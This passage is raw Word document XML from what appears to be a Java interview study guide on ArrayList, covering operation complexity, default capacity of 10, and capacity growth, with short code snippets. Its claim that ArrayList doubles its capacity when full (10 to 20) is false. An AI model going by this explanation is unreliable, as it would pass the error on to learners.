          <w:p w14:paraId="59549821" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5D0195" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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ime Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="03757DB6" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="229BA99C"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ccess by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48C688A8"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="08E9A61B" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D645914"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dd (at end)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DBA2351"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1) (amortized)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="6C47AA9A" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06961ED2"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sert (middle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48291CEE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="6624C56F" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1468D57A"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move</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D262CB"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B5ACF" w:rsidRPr="00CE4B95" w14:paraId="752B72C3" w14:textId="77777777" w:rsidTr="00DE7777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BB71C4D"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size (if full)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AC57BCF" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EDE9662" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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to Use ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3BE4AC" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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andom access is needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList provides constant-time access to elements via index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C087BC" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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requent resizing is acceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since resizing is done by copying elements, the occasional resize can affect performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7523E453" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hen thread-safety is not required</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If multiple threads are involved, other thread-safe alternatives (like CopyOnWriteArrayList) should be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB4AB9" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5AC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4F6E8947" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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internally uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E953C30" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(1)) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>amortized constant-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adding elements at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32DDA6" w14:textId="77777777" w:rsidR="00DE7777" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE7777" w:rsidP="003B5ACF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can affect performance, but the overall performance of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is generally efficient for most use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4CA94" w14:textId="78F86080"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71DB011">
          <v:rect id="_x0000_i1498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFF4F1" w14:textId="77777777" w:rsidR="00E67980" w:rsidRPr="00CE4B95" w:rsidRDefault="00E67980">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc196307634"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default size of ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="7333A0C9" w14:textId="58744A14" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">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default size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or capacity) of an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in Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC2E4A" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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you create an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without specifying an initial capacity, it will be initialized with a capacity of 10. This means that the internal array that backs the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will initially have space to hold 10 elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E789CAE" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F510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041FAA36" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD19BC7" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D520A0A" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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4F581F49" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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02B524E4" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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ing an ArrayList without specifying an initial capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54EB7B" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DAD7C8" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3494D512" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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Default capacity will be 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBEDCF8" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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Default size of the ArrayList: " + list.size());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FF03B" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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71FF4FB" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F51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0060A16" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F510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mportant Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BDE414" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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initial capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 10, but this is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not the number of elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the list. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the ArrayList will be the number of elements you actually add to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3B74C" w14:textId="77777777" w:rsidR="00C22C30" w:rsidRPr="00CE4B95" w:rsidRDefault="00C22C30" w:rsidP="007F5106">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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the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grows beyond the initial capacity (for example, when you add more than 10 elements), the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the internal array will be automatically increased, usually by doubling its current size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0315FE" w14:textId="63CD9D1A"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28CEF85">
          <v:rect id="_x0000_i1499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59112684" w14:textId="77777777" w:rsidR="00E67980" w:rsidRPr="00CE4B95" w:rsidRDefault="00E67980">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc196307635"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to increase the size of ArrayList? By how much?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="749F9A5D" w14:textId="19635223" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">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size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an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in Java increases </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as you add more elements to the list. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., the internal array size) may need to be increased when the ArrayList reaches its current capacity limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1C61E" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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ow the Capacity Increases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A28C4" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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hen the ArrayList is full</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., the number of elements exceeds its current capacity), it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the internal array size by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270AC610" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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For example, if the current capacity is 10 and you add the 11th element, the ArrayList will create a new internal array with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capacity of 20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copy all the elements to this new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D2C00" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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This resizing continues as the number of elements grows, with each resize typically doubling the array's size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DF430" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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Automatic Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D9666" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFB367" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B524311" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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7DE3DC68" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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298B7DF0" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B3946" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A87">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17813183" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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dd 11 elements to trigger resizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52552476" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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or (int i = 1; i &lt;= 11; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764B3B6" w14:textId="77777777" w:rsidR="00653B80" w:rsidRPr="00CE4B95" w:rsidRDefault="00653B80" w:rsidP="00EA7A8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i);</w:t>
      </w:r>
    </w:p>
